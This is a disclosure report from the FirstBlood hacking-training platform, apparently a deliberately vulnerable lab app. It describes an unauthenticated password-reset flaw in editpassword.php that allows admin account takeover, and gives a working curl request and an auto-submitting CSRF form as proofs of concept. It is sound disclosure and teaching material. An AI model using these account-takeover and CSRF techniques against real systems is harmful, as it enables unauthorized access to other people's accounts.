FirstBlood-#386 — Any user can update another's user password via /drpanel/drapi/editpassword.php endpoint
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-25, panya reported:
Steps to reproduce:
- Register a doctor (e.g. with a name
testas an invitation code).
- Don't login with the provided credentials.
- Update the user password via this request:
curl -X POST 'https://579a3c7897af-panya.a.firstbloodhackers.com/drpanel/drapi/editpassword.php' --data-raw 'username=admin'
it works for any user and returns the newly generated password of the provided
Password updated - s3mKUOhRTFvEo6Z
The password of the
adminuser will be updated to
s3mKUOhRTFvEo6Z. An attacker could login with this password and take over the account.
/drpanel/drapi/editpassword.phpendpoint should properly validate user role and should be accessible only for admins.
I'm not sure if it is a different bug or not, but this endpoint also doesn't have any CSRF protection, it could be exploited via this basic PoC:
<body onload="document.forms.submit()"> <form method="post" action="https://579a3c7897af-panya.a.firstbloodhackers.com/drpanel/drapi/editpassword.php"> <input type="hidden" name="username" value="admin"> </form> </body>
By visiting a html page with this code, admin user's password will be updated to a newly generated value.
FirstBlood ID: 27
Vulnerability Type: Application/Business Logic
It is possible to edit the admins password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.